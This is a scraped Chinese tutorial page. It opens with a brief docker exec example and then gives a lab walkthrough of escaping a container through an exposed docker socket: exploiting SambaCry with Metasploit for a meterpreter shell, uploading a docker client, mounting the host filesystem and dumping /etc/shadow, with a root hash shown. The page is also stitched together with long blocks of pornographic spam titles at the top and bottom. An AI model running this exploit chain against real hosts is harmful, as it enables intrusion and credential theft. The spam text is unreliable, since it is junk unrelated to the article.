成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識(shí)庫 > 在宿主機(jī)上執(zhí)行docker容器內(nèi)部的shell或程序方式

在宿主機(jī)上執(zhí)行docker容器內(nèi)部的shell或程序方式

熱門標(biāo)簽:中國地圖標(biāo)注上各個(gè)省 撫州市城區(qū)地圖標(biāo)注 電銷智能機(jī)器人試用 高德地圖標(biāo)注足跡怎么打標(biāo) 新鄉(xiāng)牧野400電話申請(qǐng) 百度地圖底圖標(biāo)注 企業(yè)辦理400電話收費(fèi)標(biāo)準(zhǔn) 智能電銷機(jī)器人真的有用么 激光標(biāo)記地圖標(biāo)注

為了避免反復(fù)進(jìn)入docker容器內(nèi)部操作,可以將一系列容器內(nèi)部的指令由宿主機(jī)來操作完成。

在宿主機(jī)(作者主機(jī)為windows7)上執(zhí)行centos容器(name為centos-1)中/usr目錄下的“printer”可執(zhí)行程序,該程序輸出為打印“123”。

C:\Users\Administrator>docker exec -it centos-1 /bin/bash -c "cd usr && ./printer" 123

成功。

補(bǔ)充知識(shí):利用Docker容器的不安全部署獲取宿主機(jī)權(quán)限

前言

濫用容器( container)及逃逸的方法有多種,本文將討論最基本的一種,即濫用docker socket來逃逸容器并在宿主機(jī)上以root身份執(zhí)行代碼。

實(shí)驗(yàn)環(huán)境設(shè)置

由于我們將使用容器,因此你必須安裝docker。

創(chuàng)建網(wǎng)絡(luò)

首先,我們?cè)趧?chuàng)建容器的地方創(chuàng)建一個(gè)docker網(wǎng)絡(luò):

docker network create pwnage

啟動(dòng)易受攻擊的容器

在本示例中,我將使用受SambaCry漏洞(CVE-2017-7494)影響的容器。有關(guān)該漏洞的更多信息,可以參閱opsxcq/exploit-CVE-2017-7494。

此漏洞允許你在Samba服務(wù)器中遠(yuǎn)程代碼執(zhí)行,我們將docker socket添加到容器中,以下是一個(gè)濫用docker的示例。

docker run --rm -it \

    --name vulnerable \

    --network pwnage \

    -v '/var/run/docker.sock:/var/run/docker.sock' \

    vulnerables/cve-2017-7494

啟動(dòng)攻擊機(jī)

實(shí)驗(yàn)環(huán)境設(shè)置完成后,接下來我們需要將攻擊者的主機(jī)添加到網(wǎng)絡(luò)中。Samba Cry存儲(chǔ)庫中有一個(gè)漏洞利用代碼,但這里我將使用Metasploit,因?yàn)樗菀咨蟼魑宜璧膬?nèi)容。

我已經(jīng)為此構(gòu)建了一個(gè)映像,只需運(yùn)行bellow命令,所有內(nèi)容都將根據(jù)實(shí)驗(yàn)環(huán)境需要運(yùn)行:

docker run --rm -it \

    --network pwnage \

    -v '/usr/bin/docker:/docker:ro' \

    strm/metasploit

加載完成后,你將看到如下界面。

攻擊利用

信息收集

在任何攻擊或測(cè)試中,信息收集都是必不可少的一個(gè)環(huán)節(jié)。因此,讓我們先來ping下易受攻擊的容器檢查下當(dāng)前的連接情況。

ping -c 2 vulnerable

如果一切正常,你應(yīng)該能看到以下輸出信息。

msf5 > ping -c 2 vulnerable 
[*] exec: ping -c 2 vulnerable 
 
PING vulnerable (172.20.0.2) 56(84) bytes of data.
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=1 ttl=64 time=0.120 ms
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=2 ttl=64 time=0.097 ms
 
--- vulnerable ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1009ms
rtt min/avg/max/mdev = 0.097/0.108/0.120/0.015 ms

然后,我們進(jìn)行基本的smb共享枚舉:

use auxiliary/scanner/smb/smb_enumshares
set rhosts vulnerable
run

輸出結(jié)果如下:

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts vulnerable
rhosts => vulnerable
msf5 auxiliary(scanner/smb/smb_enumshares) > run
 
[+] 172.20.0.2:139    - data - (DS) Data
[+] 172.20.0.2:139    - IPC$ - (I) IPC Service (Crying samba)
[*] vulnerable:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以看到,這個(gè)samba服務(wù)器中有一個(gè)名為data的共享。

獲取shell

下一步我們要做的是,針對(duì)宿主機(jī)運(yùn)行漏洞利用程序獲取shell。在Metasploit中,該漏洞名為is_known_pipename,位于exploit/linux/samba/is_known_pipename。

運(yùn)行bellow命令攻擊宿主機(jī):

use exploit/linux/samba/is_known_pipename
set RHOST vulnerable
set RPORT 445
set payload linux/x64/meterpreter/bind_tcp
set TARGET 3
set SMB_FOLDER data
set SMBUser sambacry
set SMBPass nosambanocry
exploit

如果一切順利,你將獲取到一個(gè)meterpreter shell。如下:

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set RHOST vulnerable
RHOST => vulnerable
msf5 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf5 exploit(linux/samba/is_known_pipename) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(linux/samba/is_known_pipename) > set TARGET 3
TARGET => 3
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER data
SMB_FOLDER => data
msf5 exploit(linux/samba/is_known_pipename) > set SMBUser sambacry
SMBUser => sambacry
msf5 exploit(linux/samba/is_known_pipename) > set SMBPass nosambanocry
SMBPass => nosambanocry
msf5 exploit(linux/samba/is_known_pipename) > exploit
 
[*] vulnerable:445 - Using location \\vulnerable\data\ for the path
[*] vulnerable:445 - Retrieving the remote path of the share 'data'
[*] vulnerable:445 - Share 'data' has server-side path '/data
[*] vulnerable:445 - Uploaded payload to \\vulnerable\data\shyyEPPk.so
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using \\PIPE\/data/shyyEPPk.so...
[-] vulnerable:445 -  >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using /data/shyyEPPk.so...
[-] vulnerable:445 -  >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Started bind TCP handler against vulnerable:4444
[*] Sending stage (816260 bytes) to vulnerable
 
meterpreter >

提權(quán)

我們將通過濫用容器內(nèi)可用的docker socket來提權(quán)。由于docker在宿主機(jī)上是以root身份運(yùn)行的,因此它也具有root權(quán)限。我們可以濫用它來執(zhí)行多項(xiàng)操作。例如,使用—privileged選項(xiàng)可以為我們提供許多擴(kuò)展功能,以下是從docker官方文檔中提取的解釋文本:

默認(rèn)情況下,Docker的容器是沒有特權(quán)的,例如不能在容器中再啟動(dòng)一個(gè)容器。這是因?yàn)槟J(rèn)情況下容器是不能訪問任何其它設(shè)備的。但是通過”privileged”,容器就擁有了訪問任何其它設(shè)備的權(quán)限。當(dāng)操作者執(zhí)行docker run —privileged時(shí),Docker將擁有訪問主機(jī)所有設(shè)備的權(quán)限,同時(shí)Docker也會(huì)在apparmor或者selinux做一些設(shè)置,使容器可以容易的訪問那些運(yùn)行在容器外部的設(shè)備。

你可以使用—device選項(xiàng)訪問設(shè)備。但在本示例中,我將映射toor文件系統(tǒng) (/) 到容器中并訪問它。

由于此容器中沒有docker客戶端,因此下一步我們要做的就是在目標(biāo)容器中設(shè)置docker客戶端及其依賴項(xiàng)。你只需運(yùn)行以下命令,即可完成所有這些操作。

upload /docker /docker
upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker
meterpreter > upload /docker /docker
[*] uploading : /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] uploaded  : /docker -> /docker
meterpreter > upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploading : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] Uploaded -1.00 B of 38.47 KiB (-0.0%): /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploaded  : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
meterpreter > chmod 777 /docker
meterpreter > chmod +x /docker
meterpreter >

現(xiàn)在,我們就可以使用docker來訪問宿主機(jī)上的文件系統(tǒng)了。\

execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"

我們來轉(zhuǎn)儲(chǔ)下本地用戶的哈希,輸出結(jié)果如下:

meterpreter > execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
Process 113 created.
Channel 13 created.
root:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
daemon:*:17488:0:99999:7:::
bin:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
sync:*:17488:0:99999:7:::
games:*:17488:0:99999:7:::
man:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
mail:*:17488:0:99999:7:::
news:*:17488:0:99999:7:::

以上這篇在宿主機(jī)上執(zhí)行docker容器內(nèi)部的shell或程序方式就是小編分享給大家的全部內(nèi)容了,希望能給大家一個(gè)參考,也希望大家多多支持腳本之家。

標(biāo)簽:邯鄲 南通 辛集 海西 延安 忻州 臨汾 西安

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《在宿主機(jī)上執(zhí)行docker容器內(nèi)部的shell或程序方式》,本文關(guān)鍵詞  在,宿主,機(jī)上,執(zhí)行,docker,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《在宿主機(jī)上執(zhí)行docker容器內(nèi)部的shell或程序方式》相關(guān)的同類信息!
  • 本頁收集關(guān)于在宿主機(jī)上執(zhí)行docker容器內(nèi)部的shell或程序方式的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    中文字幕一区三区| 欧美性猛交99久久久久99| 精品国产福利在线| 四虎在线免费观看| 99精品视频在线免费播放| 国产欧美日韩不卡| 国产精品一区无码| 久久深夜福利| 91精品国产综合久久久久久久久久| 69堂亚洲精品首页| 亚洲视频一区二区在线观看| 加勒比久久综合| 天天色天天干天天| av男人天堂av| 日韩欧美高清在线观看| 国产精品爱啪在线线免费观看| 五月天婷婷在线视频| 日本精品一区| 欧美熟妇精品一区二区| 国产女人18水真多毛片18精品| 女人裸体免费网站| 欧美精品一区二区久久| 久久综合中文色婷婷| 欧美xxxx18国产| av在线成人| 强制捆绑调教一区二区| 精品一区二区电影| 欧美精选视频一区二区| 国产一区二区视频在线| 完整版免费av片| 亚洲男人av电影| 日韩午夜精品视频| 99精品国产在热久久下载| 国产成人精品久久一区二区小说| 第四色中文综合网| 亚洲国产精品久久久久婷婷884| 欧美24videosex性欧美| 国产免费黄色小视频| 欧美日韩视频一区二区三区| 免费电影日韩网站| 国产精品一区二区av| 成人精品视频一区二区三区| 精品伦理一区二区| 一本加勒比北条麻妃| gogo久久| 狠狠操精品视频| 亚洲二区精品| 亚洲精蜜桃久在线| 91视频成人免费| 欧美成人在线免费| 成人免费毛片app| 国产又粗又硬又长又爽| 一级黄色片大全| 国产精品xxxxx| 最新日韩av| 在线视频亚洲一区| 国产日韩精品一区| 国产精品一区二区无线| 亚洲精品91美女久久久久久久| 国产精品xxxxxx| 亚洲精品久久视频| 日本一二三区视频免费高清| 欧美另类69xxx| 亚洲人成绝费网站色ww| 国产精品国内视频| 三级性生活视频| 精品久久网站| 亚洲精品美女视频| 日本伦理一区二区三区| 久久亚洲精品中文字幕| 2018av男人天堂| 日本高清色图| 亚洲图片制服诱惑| 香蕉网站在线| 亚洲AV无码乱码国产精品牛牛| 日韩av中文字幕在线播放| 久久久久久久久99精品| 午夜成人亚洲理伦片在线观看| 日韩欧美三级在线观看| 国产精品欧美激情在线| 色综合色狠狠天天综合色| 国产精品一区二区av交换| 美女被c出白浆| 久久99国产精品久久| 欧美一区二区三区在线| 国产欧美精品一区二区三区介绍| 欧美日韩中文字幕一区| 国产区av在线| 欧美视频不卡| 人妻无码一区二区三区免费| 亚洲成av人片在线观看香蕉| 2025韩国理伦片在线观看| 欧美一a一片一级一片| 在线观看麻豆| 一级黄色片在线观看| 国产真人做爰毛片视频直播| 日韩在线电影| 插我舔内射18免费视频| 国产日产精品一区二区三区| 香蕉免费毛片视频| 青青草免费在线视频观看| 91中文字幕在线视频| 97碰碰碰免费公开在线视频| 91网站在线免费观看| 亚洲一级在线观看| 国产欧美日韩亚州综合| 亚洲午夜久久久久中文字幕久| 欧美性潮喷xxxxx免费视频看| 成人av资源站| 国内精品一区二区三区四区| 黄色av网站在线| 国产精品爱久久久久久久小说| 狠狠鲁男人天堂| 成人免费看片视频| 欧美成人午夜77777| 国产性生活视频| 丝袜亚洲欧美日韩综合| 精品中文字幕一区二区小辣椒| 一区二区三区在线免费视频| 97se亚洲国产综合自在线| 天天撸天天射| 情趣网站视频在线观看| 欧美精选在线| 澳门成人av网| 国产欧美日韩精品专区| 九九色在线视频| 男女羞羞视频网站| 亚洲人体一区| 在线观看av资源| 超碰成人免费| 日本精品一区二区三区在线观看视频| 视频一区二区综合| 日本三级午夜理伦三级三| 99自拍视频在线观看| 放荡的美妇在线播放| 特级全黄一级毛片| 免费人成短视频在线观看网站| 日本黄网免费一区二区精品| 欧美性生交xxxxx久久久| www日本黄色| 亚洲网站在线| 国产精品美女主播在线观看纯欲| 亚洲国产精品久久艾草纯爱| 欧美 日本 亚洲| 国内a∨免费播放| 国产一区二区三区免费观看| 99精品全国免费观看视频软件| 亚洲人成电影在线| 两个人看的在线视频www| jk漫画禁漫成人入口| dj大片免费在线观看| 亚洲欧洲一区二区| 色先锋资源久久综合| 国产成人免费在线观看不卡| 天堂网www中文在线| 国产精品久久久久久久天堂第1集| 日本边添边摸边做边爱的第三级| a级片免费视频| 国产午夜亚洲精品理论片色戒| 国产在线精品国自产拍免费| 欧美日韩亚洲丝袜制服| 能免费看av的网站| 超碰成人免费在线| 在线播放中文字幕| 国产亚洲精品自在线观看| 国产一卡二卡3卡4卡四卡在线| 99热都是精品| 日韩精品综合在线| 亚洲图片欧美综合| 欧美性天天影视| 国产精品免费91| 六月婷婷色综合| 狠狠躁夜夜躁人人爽天天天天97| 国产探花在线观看视频| 国产精品女人网站| 久久91精品国产| 亚洲狼人综合网| 国产精品毛片一区视频| 欧美国内亚洲| 四虎永久成年免费影院| 亚洲精品在线视频免费| 国产亚洲精品久久久久久牛牛| 香港欧美日韩三级黄色一级电影网站| 免费观看美女裸体网站| 波多野结衣高清视频| 国产精品入口日韩视频大尺度| 伊人久久大香线蕉综合四虎小说| 亚洲欧洲日本国产| aaa欧美色吧激情视频| 亚洲男人天堂2021| av黄在线观看| aa视频在线观看| 中文字幕乱伦视频| 国产一区在线不卡| 欧美日韩一级在线观看| 亚洲国产高清自拍| 国产一区二区三区中文| 国产视频一二| 精品国产自在精品国产浪潮| 亚洲色图自拍| 最新真实国产在线视频| 免费黄色成人| 全色精品综合影院| 精品国产3级a| 国产性70yerg老太| 亚洲精品无码久久久| 伊人狠狠av| 尤物九九久久国产精品的分类| 人妻无码视频一区二区三区| 久久美女福利视频| 色综合久久99| 日本妇女毛茸茸| 国产日韩欧美在线一区| 精品免费在线视频| 成人av手机在线| 日韩av片在线播放| 国自产拍偷拍福利精品免费一| 成人av网站大全| 日本黄在线观看| 欧美精品密入口播放| 日本欧美肥老太交大片| 夫妻av一区二区| 国产欧美日本一区视频| 农村妇女一区二区| 国产精品一二三区| 日本一区二区三区在线免费观看| 久草综合在线| 亚洲看片免费| 日本欧洲一区| 91chinesevideo永久地址| 亚洲看片网站| 少妇极品熟妇人妻无码| 亚洲国产精品va在线观看黑人| 久久久精品在线视频| 97精品一区二区视频在线观看| h视频在线免费| 精品在线91| 美女国产精品| 98色花堂精品视频在线观看| 最近国语视频在线观看免费播放| 丝袜+亚洲+另类+欧美+变态| www.日韩一区| 久久久精品在线视频| 国产成人一区二区三区免费看| 116美女写真午夜一级久久| 久久久久久久av| 国产精品久久久久久福利一牛影视| 亚洲精品18在线观看| 中文字幕在线观看播放| 久久超碰97人人做人人爱| 免费人成黄页在线观看忧物| 国产精品第3页| 双性尿奴穿贞c带憋尿| 国产99对白在线播放| 在线免费黄网| 欧美人妖巨大在线| 在线观看亚洲视频啊啊啊啊| 国产精品一级黄片| 91浏览器在线观看| 色乱码一区二区三区在线| 猫咪成人在线观看| 亚洲精品日韩激情在线电影| 欧美日韩国产区| 中文字幕一二三四区| 欧美偷窥清纯综合图区| 国精产品乱码一区一区三区四区| 欧美日韩国产一区二区| 91网站在线观看免费| 一个人看的日本免费视频| 日韩专区第三页| 精品一区二区三区无码视频| 日韩一区二区三免费高清在线观看| 一个人看的免费网站www视频| 少妇大叫太粗太大爽一区二区| 久久久精品人体av艺术| 日韩成人精品视频在线观看| 青青视频在线播放| 午夜老司机福利| 欧美午夜黄色| 免费一区二区三区视频狠狠| jizz一区二区三区| 亚洲图片小说在线| 成人欧美一区二区三区在线| 亚洲成人天堂网| 久久激情婷婷| 最近看过的日韩成人| 97久久超碰国产精品| 成年人视频在线免费看| 色94色欧美sute亚洲线路一久| 免费看成年视频网页| 少妇一级淫片免费看| 涩涩av在线| 欧美黄色www| 欧美一区二区三区人| 国模一区二区| xxxxxx国产| 日韩综合网站| 日韩在线观看成人| 久草综合在线观看| 蜜桃网站成人| 中文字幕亚洲欧美日韩高清| 日韩在线观看一区二区三区| 福利在线小视频| 樱花草国产18久久久久| 久久五月婷婷丁香社区| 欧美白人最猛性xxxxx69交| 最新免费av网址| 日本www在线视频| 国产欧美综合一区二区三区| 国产精久久久久久| 亚洲精品国产精品国自产网站按摩| 625成人欧美午夜电影| 国产精品日韩三级| 亚洲深夜福利| 精品久久久久久综合日本欧美| 日韩人妻无码精品久久久不卡| 91www在线观看| 国产一区二区三区在线观看视频| heyzo高清在线| 国产女人18毛片水真多成人如厕| 国产av人人夜夜澡人人爽| 欧美日韩视频在线观看一区二区三区| 中文视频一区视频二区视频三区| 亚洲狠狠婷婷综合久久蜜桃| 亚洲一区成人| 91国内精品视频| 日韩欧美一级大片| 日韩av在线第一页|